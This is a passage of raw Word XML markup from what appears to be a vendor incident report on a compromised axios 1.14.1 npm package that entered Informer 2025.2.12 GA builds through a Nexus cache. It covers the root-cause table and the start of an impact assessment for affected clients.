      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, which at that time was the compromised </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, and cached it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA80" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> GA builds consumed the poisoned cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> When the 2025.2.12 GA build </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>distributables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> were created on March 31, the build process resolved </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>ibm_db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> transitive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> dependency from the Nexus cache, pulling the compromised </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA81" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="009764A3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278CFA82" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.2 Root Cause Summary</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1993"/>
        <w:gridCol w:w="7367"/>
      </w:tblGrid>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA85" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993"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83" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Factor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366"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84" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA88" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993"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86" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Proximate cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366"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87" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Nation-state supply chain attack (Sapphire Sleet) against the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>axios</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> package</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA8B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA89" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Contributing cause #1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA8A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Transitive dependency (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>ibm_db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">) using an open </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>semver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> range (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>^1.12.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>axios</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA8E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="757"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993"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8C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Contributing cause #2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366"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8D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">No version pinning, override, or lock mechanism for transitive dependencies in build processes. Per-package locking or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>shrinkwrapping</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> unsupported by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>monorepo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> workspaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA91" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA8F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Contributing cause #3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA90" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Nexus proxy-repository performed an unconstrained lazy fetch from the public </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> registry during the attack window</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA94" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993"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92" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Contributing cause #4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366"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93" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>No integrity verification, quarantine, or age-gating policy for newly cached packages in Nexus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278CFA95" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="ECF0F1"/>
        </w:pBdr>
        <w:spacing w:before="450" w:after="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="1A3C6E"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>5. Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA96" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:hint="eastAsia"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.1 Who Is Potentially Affected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA97" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Clients are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>potentially</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> affected if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">both 1 &amp; 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">are true, and have a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>high probability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> of being affected if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following conditions are true:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA98" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> They downloaded an Informer 2025.2.12 GA build distributable from the March 31 distribution, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA99" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> They ran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install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> resolving dependencies against Entrinsik's Nexus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> repository (directly via command line arguments or more indirectly via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> config) </w:t>
      </w:r>
